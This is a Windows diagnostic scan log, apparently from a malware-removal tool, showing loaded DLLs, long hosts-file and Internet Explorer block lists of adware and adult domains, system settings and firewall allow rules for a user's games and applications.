2016-02-26 06:50 - 2016-02-18 14:14 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
2015-02-19 13:47 - 2001-07-26 15:17 - 00692224 _____ () D:\Internode\libeay32.dll
2015-02-19 13:47 - 2001-07-26 15:18 - 00151552 _____ () D:\Internode\ssleay32.dll
2015-07-02 13:20 - 2015-07-02 13:20 - 40540672 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2015-11-16 20:48 - 2015-11-16 20:48 - 00137728 _____ () C:\ProgramData\Razer\Synapse\CrashReporter\CrashRpt1402.dll
2015-09-24 13:36 - 2015-08-28 07:30 - 40622592 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libcef.dll
2015-04-03 17:51 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2016-01-02 16:45 - 2015-10-07 05:26 - 50656768 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libcef.dll
2016-01-02 16:45 - 2015-10-07 05:26 - 01874944 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libglesv2.dll
2016-01-02 16:45 - 2015-10-07 05:26 - 00075264 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libegl.dll
2015-09-24 13:36 - 2015-08-28 07:30 - 00911360 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libglesv2.dll
2015-09-24 13:36 - 2015-08-28 07:30 - 00134144 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libegl.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
==================== EXE Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com
There are 7870 more sites.
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123simsen.com -> www.123simsen.com
There are 7870 more sites.
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-14 12:34 - 2016-02-28 21:02 - 00450902 ____R C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 www.007guard.com
127.0.0.1 007guard.com
127.0.0.1 008i.com
127.0.0.1 www.008k.com
127.0.0.1 008k.com
127.0.0.1 www.00hq.com
127.0.0.1 00hq.com
127.0.0.1 010402.com
127.0.0.1 www.032439.com
127.0.0.1 032439.com
127.0.0.1 www.0scan.com
127.0.0.1 0scan.com
127.0.0.1 1000gratisproben.com
127.0.0.1 www.1000gratisproben.com
127.0.0.1 1001namen.com
127.0.0.1 www.1001namen.com
127.0.0.1 100888290cs.com
127.0.0.1 www.100888290cs.com
127.0.0.1 www.100sexlinks.com
127.0.0.1 100sexlinks.com
127.0.0.1 10sek.com
127.0.0.1 www.10sek.com
127.0.0.1 www.1-2005-search.com
127.0.0.1 1-2005-search.com
127.0.0.1 123fporn.info
127.0.0.1 www.123fporn.info
127.0.0.1 123haustiereundmehr.com
127.0.0.1 www.123haustiereundmehr.com
127.0.0.1 123moviedownload.com
127.0.0.1 www.123moviedownload.com
There are 15468 more lines.
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\Control Panel\Desktop\\Wallpaper -> c:\users\kym\appdata\local\packages\microsoft.windows.photos_8wekyb3d8bbwe\localstate\photosappbackground\20150215_012121688_ios.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\StartupApproved\StartupFolder: => "Open Broadcaster Software (32bit) (2).lnk"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{48CEB542-655B-422A-B09D-BFDF5ACFC2DE}] => (Allow) D:\Microsoft Office 2013\Office15\outlook.exe
FirewallRules: [{07CF4E87-E18E-4151-AF15-6E0D5A61CD56}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
FirewallRules: [{E6424F0D-1043-4F45-ABB4-54594825877D}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
FirewallRules: [{B087B5F1-8B72-4FCA-A5C4-EEF672EB226F}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
FirewallRules: [{2E96B917-6E0A-4C39-8FAF-CF6991B7A9E9}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
FirewallRules: [{0A42A4D6-702C-4A20-AAA8-66BCB8F63F6A}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{CFA461BE-DE59-4B87-B67F-48577B41F94D}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{9B2F8065-74C1-4CF4-9AB6-785709683C8B}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
FirewallRules: [{C93BD8EB-D0F0-4077-9B6B-DAC6C0EA78AA}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
FirewallRules: [{9A785830-F8A4-4C14-98FF-EA82E1D9D900}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{33391FC5-0E44-44F8-AD28-5F02628A1093}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{0A22C041-F41D-42C3-B571-A70B35DBF973}] => (Allow) LPort=54925
FirewallRules: [UDP Query User{252EAFA3-7210-44C6-8374-ACA676045C0B}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{2877E791-1CCB-42A5-86E9-438A16014E27}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{5F0F31E8-3F0B-46EB-B0D3-CA4A50E24B45}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
FirewallRules: [TCP Query User{784D8C91-CAAD-4BAF-9AB8-C4D37B5348F8}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
FirewallRules: [{A3B20735-B836-4096-92B1-7F605DD53102}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{2E30376F-B970-46BD-8899-EB16CBD57F77}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{56C40FDB-D1D8-4300-9444-462D37777935}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
FirewallRules: [{BB33C2C8-BD13-4B46-AB4B-945AB63AD76D}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
FirewallRules: [UDP Query User{181AB5DD-4B58-40DC-83A7-E0220CA18F90}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [TCP Query User{DF812EF1-9277-44ED-85D2-17CC01EE6A83}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [{86532A14-A6CC-4BFC-BD35-2C868592B80F}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
FirewallRules: [{AB156E35-4ABB-46D8-9882-87F8777E7C40}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
FirewallRules: [{CB0E2CEA-ECBD-49C7-B03C-B09F6B9E5F82}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{4A7C1317-3631-4AA3-8955-49385287E4E4}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{E5F6F467-33E1-4473-8BF5-7B02CF2F6AE5}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{DD2E394F-C0A9-4BE1-8B27-F31AEDB8A861}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{FCBC243E-7F87-40E3-BDFE-602D2F7F8F84}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{F85EFD68-AFA7-42E0-9EB7-24BC00055581}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{DC23B312-10EB-4DEC-96E0-43DA215B3471}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{1A7C934B-D0B9-45AC-A983-43FF06786E6D}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{E195526E-E66B-41A6-8D03-D693704045EA}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [{757BAA93-318B-49C6-A2AF-697C8B020683}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [UDP Query User{5A46E22D-A3AA-4D71-9164-4444349A2E37}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [TCP Query User{8D040A27-B2B3-48B2-AE4D-CF5A6B2B9575}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [{F2975338-B532-432A-8BB2-E7257A66FB37}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{A92059AE-40CC-4490-B046-D5E8EB1EA379}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{E73880A3-C095-497C-BB99-0FF4F9A222C4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
FirewallRules: [{297EF2CF-1068-49B7-945F-7F71EA277019}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
FirewallRules: [{4A156579-629D-40A0-AD60-DAF22460B1A0}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
FirewallRules: [{895120DB-A4F1-47CE-9070-457BFAE3272C}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
FirewallRules: [{AB2CC394-E9FE-498E-A877-0661AB134F15}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
FirewallRules: [{9ECAEE5C-41DF-4173-9FD7-BF8A01B28AF5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
FirewallRules: [{0740F5E2-B69A-40E8-8DD2-D95CC993A671}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{BAF0FA59-C99C-4003-97DC-FE0050EAE7E6}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{59C72BBD-55D5-46BB-9D94-83EC35F8C1E6}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
FirewallRules: [{CDB3FF16-5E27-45A8-A944-246B3448C710}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
FirewallRules: [{15B898B7-E0CD-4607-B1C4-DCA61C30BAF4}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{F07CB940-6D92-4342-9696-AAD6C596DB2D}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{759D3D16-BF79-4EB7-A210-0BE0F00D3DE2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{9BF516F4-E2B1-4F2F-A84D-B7092B2B122E}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{E1DBBBC1-157A-4212-B0D2-AA4DC1A3B620}] => (Allow) LPort=54925
FirewallRules: [{2250328F-7FF9-4F66-94E8-EE8BCBBF5767}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
FirewallRules: [{EF4512A5-DBBF-48C4-B269-B56A1B629D96}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
FirewallRules: [{5E0948FB-AB6B-4342-9299-E743A7E82CD5}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
FirewallRules: [{24639D5A-3321-4183-A818-D896BC8761C8}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
FirewallRules: [{F9551992-B61C-4405-BC17-71BDF9CF57AD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
FirewallRules: [{4C4131C5-3599-4D91-8FDE-E5FC28727831}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
FirewallRules: [{E0C0796F-728A-4514-96B3-64E78C3581F7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
FirewallRules: [{BFAD5EDC-8BE9-42A3-94D2-D4C8457134B0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
FirewallRules: [{F80F90B0-6FF0-4F96-9E65-E042003CE976}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{CE810206-FB49-40BF-B541-9EE0F88FCE29}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{F7CE0552-38B5-4F44-9E96-7E7CD1C904DF}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{B4DB672A-158E-45E5-B3B8-D4A3F5026452}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{F4BE57AB-8465-4DAD-8924-6FF609FD1D75}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
FirewallRules: [{756ED978-037A-4F3D-A428-E87DAF9720E2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
FirewallRules: [UDP Query User{5C458673-1B35-424D-BAA3-78CAA5394D57}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
FirewallRules: [TCP Query User{E50AE07B-9053-4BF0-89FE-8539B27A5423}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
FirewallRules: [{5D946922-67D2-47E1-8E89-CBFE1C6345B1}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
FirewallRules: [{4F7B44EC-2514-42B8-B292-F088413D9EEC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
FirewallRules: [UDP Query User{CB540F47-8AB3-4B36-B34A-E3824B1FED40}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
FirewallRules: [TCP Query User{FE0A9CD1-00B6-4747-9F1C-755ACCB4C879}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
FirewallRules: [{8E6EEA97-8D35-486D-B2B6-A2E9F8BF338C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
FirewallRules: [{A3FE7E6A-1E6C-4E76-A75D-A4D1DCA0EDC0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
FirewallRules: [{769BECB0-54E0-47E7-9759-ECAF2E28273D}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
FirewallRules: [{7B0D63B9-31A4-4ADB-8F22-69D31A83D9B8}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
FirewallRules: [{3B9FA9A3-38E7-41D2-88A1-0BB43DE029BD}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{74A436A7-8819-4F18-8F60-716D8A0E357E}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{48B12E80-9B0D-46D9-A92C-7D542E713519}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{B1560556-55E2-42A6-A2E3-F65F2A7A5E97}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{75F5A6EB-BD39-4FE4-A690-4ABD347FD037}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{099743C1-9DF8-4750-949F-761AC80ABAC6}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{9F777184-4A13-4D03-A7C0-01D49AEABDDE}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{FCA495C1-8148-4FE6-A6C4-C517B16D4099}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{1E57FFC8-E277-4527-A558-4E533468C4FD}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
FirewallRules: [{FF7C891B-641F-403F-BDCB-015433DB2BB8}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
FirewallRules: [{67B411DD-238B-4813-AF90-1F0C53336E41}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{0B80C1B4-520A-43F6-A486-2689BB9F4589}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{D1348AB0-4C36-4E08-AEE7-833E635A6B76}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
FirewallRules: [{7FC743AA-D733-419F-8042-A035AD45F3B5}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
FirewallRules: [{F5F95BD3-A35E-44EE-A112-E2F68B3D3A0A}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
FirewallRules: [{112C8525-A869-473F-A5AE-968AEB8835F7}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
FirewallRules: [{20B0CC62-3200-4EEF-B0B7-37B644402890}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{EF08C331-87FB-4CC5-ACB3-8EE65B40BA62}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{BF9681B5-75E6-4BB8-A9E8-33A6536FD70F}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
FirewallRules: [{D7D86F73-58B4-4297-BD11-31694ED9AAE0}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
FirewallRules: [{DD0DCF4C-E8E1-49DD-900A-DD6AC7BC5C3C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{CF01C627-5181-49F6-8E87-A4C0CBDD7CA7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{7E20D8C2-63C2-4175-95E6-1343C3ECD0C6}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{491A2AED-C695-4F06-BA71-CB7838E9C4FF}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{5E2969A1-BE68-4265-A8FC-7097A7ECBB11}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
FirewallRules: [{74E554AC-E08A-4335-B417-29987ADE8453}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
FirewallRules: [{A03CA821-5944-4FD4-AA99-63D9A7D540E2}] => (Allow) D:\Hearthstone\Hearthstone.exe
FirewallRules: [{7D59F7B3-275B-4781-B5B3-F54F6611ABE6}] => (Allow) D:\Hearthstone\Hearthstone.exe
FirewallRules: [{A01AFC7A-FADD-4E17-B5C6-7189DE2CD1CE}] => (Allow) D:\StarCraft II\StarCraft II.exe
FirewallRules: [{700AEC12-F515-4E9F-AE1F-ACFE78622256}] => (Allow) D:\StarCraft II\StarCraft II.exe
FirewallRules: [{ABA0ADF7-7B84-4F79-85B1-13F0FF4024DE}] => (Allow) D:\Diablo III\Diablo III.exe
FirewallRules: [{6CF41658-1CD6-4500-AC43-A82F127ACABB}] => (Allow) D:\Diablo III\Diablo III.exe
FirewallRules: [{C2481D3E-C354-4753-BD12-A8F578C331BF}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [{16888A73-5F47-429F-A727-2E2184704346}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [{7CD9AF2C-6572-4973-B88A-D6A325B74B4F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
FirewallRules: [{F9A7B398-94AE-45D6-8514-BEA802B1E5E2}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
FirewallRules: [{512EF9C6-D108-459F-8832-0603753D2F89}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B598ABAB-0FDC-43A9-BD15-FF9FF99D712C}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{E4955EAC-E367-495F-B0A4-89B8B7610B29}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{416A0B8C-2763-42F0-82EB-9269719E1BE4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{15969D30-C471-468E-B2ED-1594FE384FC3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{08FE19D4-7434-48EA-A27A-93ED53D7717A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{933A444B-2C3D-45AC-80E9-EFE8EB8DAD9D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{EF266A5B-42EB-4853-A982-4DED1ADF6F73}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{BC4FFE1F-5AF4-4233-8E52-5094D6FE9F07}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{31F097A5-8E00-4169-A16D-1C9A71721FA1}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{F5C42520-0135-45B4-8FB0-5BD9692C80EE}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [TCP Query User{3D2AB9FC-2A79-4098-9681-6706A621D53F}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{09124E07-AE4B-4C80-A7E2-E96A37034496}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [{923D26F5-A4EE-433D-BE2B-5CE473180539}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{E6F2E9A0-F842-4541-8D31-CE38FDD09EDE}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{F906BBDC-3C41-494C-A264-2234D81FEF3E}] => (Block) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Adobe Premiere Elements 11\Adobe Premiere Elements.exe
FirewallRules: [{BD0F045D-D2C0-41A7-8024-69C5F302A95F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{7710A3C2-777C-4F45-BA7E-19121D633EB3}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{7172F858-7B10-43BC-B718-09A53F078F3C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6B94AB4E-EBC9-430B-A32F-B62386B68D88}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{F70F4B42-49F1-4B1A-B8A8-FCF794C81494}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
